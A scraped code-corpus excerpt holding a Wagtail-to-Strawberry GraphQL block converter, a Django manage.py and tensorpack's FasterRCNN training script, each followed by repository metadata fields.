# TODO: don't use dataclasses
x = dataclasses.make_dataclass(
class_name, [("id", strawberry.ID), (value_field_name, value_type)]
)
x.from_data = classmethod(from_data)
return strawberry.type(x)
def get_type_for_stream_block(
block: StreamBlock,
class_name: str,
) -> Type:
types = set()
block_map = {}
for field_block in block.child_blocks.values():
name = class_name + capitalize_first(to_camel_case(field_block.name))
type_ = _get_type_for_field_block(field_block, name)
if isinstance(type_, StrawberryUnion):
assert type_.graphql_name
type_.graphql_name += "Values"
type_ = _make_type(name, "values", List[type_], None)
block_map[field_block.name] = type_
types.add(type_)
union_type = strawberry.union(
class_name, types=tuple(sorted(types, key=lambda x: str(x)))
)
union_type._block_map = block_map
return union_type
def _get_type_for_field_block(field_block: FieldBlock, name: str) -> Optional[Type]:
type_ = None
if isinstance(field_block, CharBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], value=data["value"])
type_ = _make_type(name, "value", str, from_data)
elif isinstance(field_block, RichTextBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], html=data["value"])
type_ = _make_type(name, "html", HTML, from_data)
elif isinstance(field_block, ImageChooserBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], image=data["value"])
type_ = _make_type(name, "image", str, from_data)
elif isinstance(field_block, StreamBlock):
type_ = get_type_for_stream_block(field_block, name)
if type_ is None:
raise ValueError(f"Unknown type for {field_block}")
type_._origin_field_block = field_block # type: ignore
return type_
def _get_block(block: dict, parent_type: Type) -> Any:
block_type = parent_type._block_map.get(block["type"])
if not block_type:
return None
block_data = block.copy()
block_data.pop("type")
if type(block["value"]) is list:
# mmm
print("🌼🌼🌼")
print(block_type._type_definition.fields[1].__dict__)
block_value_type = block_type._type_definition.fields[1].type.of_type
value = [
_get_block(sub_block, block_value_type) for sub_block in block["value"]
]
print(block_type)
print(block_value_type)
print(value)
return block_type(id=block_data["id"], values=value)
return block_type.from_data(block_data)
def get_resolver_for_stream_field(field: StreamField, type: Type) -> Callable:
def _resolver(root: Any) -> List[type]:
raw_data = getattr(root, field.name)._raw_data
data = []
for block in raw_data:
block_data = _get_block(block, type)
if block_data:
data.append(block_data)
return data
return _resolver
| 27.463235
| 84
| 0.672825
|
import dataclasses
from typing import Any, Callable, List, Optional, Type
from wagtail.core.blocks.field_block import CharBlock, FieldBlock, RichTextBlock
from wagtail.core.blocks.stream_block import StreamBlock
from wagtail.core.fields import StreamField
from wagtail.images.blocks import ImageChooserBlock
import strawberry
import strawberry.django
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from .scalars import HTML
def _make_type(
class_name: str, value_field_name: str, value_type: Type, from_data: Callable
) -> Type:
x = dataclasses.make_dataclass(
class_name, [("id", strawberry.ID), (value_field_name, value_type)]
)
x.from_data = classmethod(from_data)
return strawberry.type(x)
def get_type_for_stream_block(
block: StreamBlock,
class_name: str,
) -> Type:
types = set()
block_map = {}
for field_block in block.child_blocks.values():
name = class_name + capitalize_first(to_camel_case(field_block.name))
type_ = _get_type_for_field_block(field_block, name)
if isinstance(type_, StrawberryUnion):
assert type_.graphql_name
type_.graphql_name += "Values"
type_ = _make_type(name, "values", List[type_], None)
block_map[field_block.name] = type_
types.add(type_)
union_type = strawberry.union(
class_name, types=tuple(sorted(types, key=lambda x: str(x)))
)
union_type._block_map = block_map
return union_type
def _get_type_for_field_block(field_block: FieldBlock, name: str) -> Optional[Type]:
type_ = None
if isinstance(field_block, CharBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], value=data["value"])
type_ = _make_type(name, "value", str, from_data)
elif isinstance(field_block, RichTextBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], html=data["value"])
type_ = _make_type(name, "html", HTML, from_data)
elif isinstance(field_block, ImageChooserBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], image=data["value"])
type_ = _make_type(name, "image", str, from_data)
elif isinstance(field_block, StreamBlock):
type_ = get_type_for_stream_block(field_block, name)
if type_ is None:
raise ValueError(f"Unknown type for {field_block}")
type_._origin_field_block = field_block # type: ignore
return type_
def _get_block(block: dict, parent_type: Type) -> Any:
block_type = parent_type._block_map.get(block["type"])
if not block_type:
return None
block_data = block.copy()
block_data.pop("type")
if type(block["value"]) is list:
# mmm
print("🌼🌼🌼")
print(block_type._type_definition.fields[1].__dict__)
block_value_type = block_type._type_definition.fields[1].type.of_type
value = [
_get_block(sub_block, block_value_type) for sub_block in block["value"]
]
print(block_type)
print(block_value_type)
print(value)
return block_type(id=block_data["id"], values=value)
return block_type.from_data(block_data)
def get_resolver_for_stream_field(field: StreamField, type: Type) -> Callable:
def _resolver(root: Any) -> List[type]:
raw_data = getattr(root, field.name)._raw_data
data = []
for block in raw_data:
block_data = _get_block(block, type)
if block_data:
data.append(block_data)
return data
return _resolver
| true
| true
|
f70b734b40b8db78f6f6d0cfd6df74f70c01ab5f
| 804
|
py
|
Python
|
irs990/manage.py
|
jsfenfen/irs990_admin
|
40eae9e04af35f0b047b4e85b0cb41ef294a3eeb
|
[
"Apache-2.0"
] | null | null | null |
irs990/manage.py
|
jsfenfen/irs990_admin
|
40eae9e04af35f0b047b4e85b0cb41ef294a3eeb
|
[
"Apache-2.0"
] | 5
|
2018-04-11T20:46:48.000Z
|
2020-04-28T11:57:06.000Z
|
irs990/manage.py
|
jsfenfen/irs990_admin
|
40eae9e04af35f0b047b4e85b0cb41ef294a3eeb
|
[
"Apache-2.0"
] | 5
|
2018-04-10T21:34:01.000Z
|
2020-09-29T17:47:21.000Z
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "irs990.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 34.956522
| 77
| 0.641791
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "irs990.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| true
| true
|
f70b74bcb3342cafe7f11ffe27d5eb119c2c1352
| 23,631
|
py
|
Python
|
examples/FasterRCNN/train.py
|
bzamecnik/tensorpack
|
e9a3c2b3cd441e5b288607b44f2fe44fbf3ad4bb
|
[
"Apache-2.0"
] | null | null | null |
examples/FasterRCNN/train.py
|
bzamecnik/tensorpack
|
e9a3c2b3cd441e5b288607b44f2fe44fbf3ad4bb
|
[
"Apache-2.0"
] | null | null | null |
examples/FasterRCNN/train.py
|
bzamecnik/tensorpack
|
e9a3c2b3cd441e5b288607b44f2fe44fbf3ad4bb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: train.py
import argparse
import itertools
import numpy as np
import os
import shutil
import cv2
import six
assert six.PY3, "FasterRCNN requires Python 3!"
import tensorflow as tf
import tqdm
import tensorpack.utils.viz as tpviz
from tensorpack import *
from tensorpack.tfutils import optimizer, collect_env_info
from tensorpack.tfutils.common import get_tf_version_tuple
from tensorpack.tfutils.summary import add_moving_summary
import model_frcnn
import model_mrcnn
from basemodel import image_preprocess, resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from dataset import DetectionDataset
from config import finalize_configs, config as cfg
from data import get_all_anchors, get_all_anchors_fpn, get_eval_dataflow, get_train_dataflow
from eval import DetectionResult, predict_image, multithread_predict_dataflow, EvalCallback
from model_box import RPNAnchors, clip_boxes, crop_and_resize, roi_align
from model_cascade import CascadeRCNNHead
from model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses
from model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, sample_fast_rcnn_targets
from model_mrcnn import maskrcnn_loss, maskrcnn_upXconv_head
from model_rpn import generate_rpn_proposals, rpn_head, rpn_losses
from viz import draw_annotation, draw_final_outputs, draw_predictions, draw_proposal_recall
try:
import horovod.tensorflow as hvd
except ImportError:
pass
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
# The learning rate in the config is set for 8 GPUs, and we use trainers with average=False.
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
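        # Editorial note (assumption, not in the original file): with, say,
        # cfg.TRAIN.NUM_GPUS == 2, dividing lr by 8 above and accumulating
        # gradients over 8 // 2 == 4 steps keeps each effective update
        # roughly equivalent to the 8-GPU reference configuration.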
def get_inference_tensor_names(self):
"""
Returns two lists of tensor names to be used to create an inference callable.
Returns:
[str]: input names
[str]: output names
"""
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image']) # 1CHW
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs) # inputs?
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR), tf.int32, 'anchor_labels'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR, 4), tf.float32, 'anchor_boxes'),
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')] # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:] # h,w
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # fHxfWxNAx4, floatbox
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
# sample proposal boxes in training
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
# The boxes to be used to crop RoIs.
# Use all proposal boxes in inference
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1]) # nxcx7x7
# Keep C5 feature to be shared with mask branch
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
# In training, mask branch shares the same C5 feature.
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0) # #fg x #cat x 14x14
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False) # nfg x 1x14x14
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0) # #result x #cat x 14x14
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx14x14
tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.TensorSpec((None, None, num_anchors), tf.int32,
'anchor_labels_lvl{}'.format(k + 2)),
tf.TensorSpec((None, None, num_anchors, 4), tf.float32,
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')]) # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:] # h,w
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
# Multi-Level RPN Proposals
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False) # fg x 1x28x28
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
# Cascade inference needs roi transform with refined boxes.
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx28x28
tf.sigmoid(final_mask_logits, name='output/masks')
return []
def do_visualize(model, model_path, nr_visualize=100, output_dir='output'):
"""
Visualize some intermediate results (proposals, raw predictions) inside the pipeline.
"""
df = get_train_dataflow() # we don't visualize mask stuff
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def do_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
for dataset in cfg.DATA.VAL:
logger.info("Evaluating {} ...".format(dataset))
dataflows = [
get_eval_dataflow(dataset, shard=k, num_shards=num_gpu)
for k in range(num_gpu)]
all_results = multithread_predict_dataflow(dataflows, graph_funcs)
output = output_file + '-' + dataset
DetectionDataset().eval_or_save_inference_results(all_results, dataset, output)
def do_predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = predict_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output for {} written to output.png".format(input_file))
tpviz.interactive_imshow(viz)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file", nargs='+')
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
DetectionDataset() # initialize the config with information from our dataset
if args.visualize or args.evaluate or args.predict:
if not tf.test.is_gpu_available():
from tensorflow.python.framework import test_util
assert get_tf_version_tuple() >= (1, 7) and test_util.IsMklEnabled(), \
"Inference requires either GPU support or MKL support!"
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
do_visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
predictor = OfflinePredictor(predcfg)
for image_file in args.predict:
do_predict(predictor, image_file)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
do_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
logger.info("Environment Information:\n" + collect_env_info())
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
# warmup is step based, lr is epoch based
init_lr = cfg.TRAIN.WARMUP_INIT_LR * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
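        # Worked example (editorial; values hypothetical): with 8 GPUs
        # (factor == 1.0), stepnum == 500 and cfg.TRAIN.LR_SCHEDULE ==
        # [120000, 160000, 180000], this loop appends (240, BASE_LR * 0.1)
        # and (320, BASE_LR * 0.01) to lr_schedule.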
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
# This is what's commonly referred to as "epochs"
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if cfg.TRAIN.EVAL_PERIOD > 0:
callbacks.extend([
EvalCallback(dataset, *MODEL.get_inference_tensor_names(), args.logdir)
for dataset in cfg.DATA.VAL
])
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
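# Editorial usage sketch (not in the file; the flags come from the argparse
# definition above, values are hypothetical):
#   ./train.py --config MODE_FPN=True TRAIN.NUM_GPUS=8 --load /path/to/pretrained.npz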
| 45.183556
| 116
| 0.636791
|
import argparse
import itertools
import numpy as np
import os
import shutil
import cv2
import six
assert six.PY3, "FasterRCNN requires Python 3!"
import tensorflow as tf
import tqdm
import tensorpack.utils.viz as tpviz
from tensorpack import *
from tensorpack.tfutils import optimizer, collect_env_info
from tensorpack.tfutils.common import get_tf_version_tuple
from tensorpack.tfutils.summary import add_moving_summary
import model_frcnn
import model_mrcnn
from basemodel import image_preprocess, resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from dataset import DetectionDataset
from config import finalize_configs, config as cfg
from data import get_all_anchors, get_all_anchors_fpn, get_eval_dataflow, get_train_dataflow
from eval import DetectionResult, predict_image, multithread_predict_dataflow, EvalCallback
from model_box import RPNAnchors, clip_boxes, crop_and_resize, roi_align
from model_cascade import CascadeRCNNHead
from model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses
from model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, sample_fast_rcnn_targets
from model_mrcnn import maskrcnn_loss, maskrcnn_upXconv_head
from model_rpn import generate_rpn_proposals, rpn_head, rpn_losses
from viz import draw_annotation, draw_final_outputs, draw_predictions, draw_proposal_recall
try:
import horovod.tensorflow as hvd
except ImportError:
pass
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
def get_inference_tensor_names(self):
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image'])
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs)
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
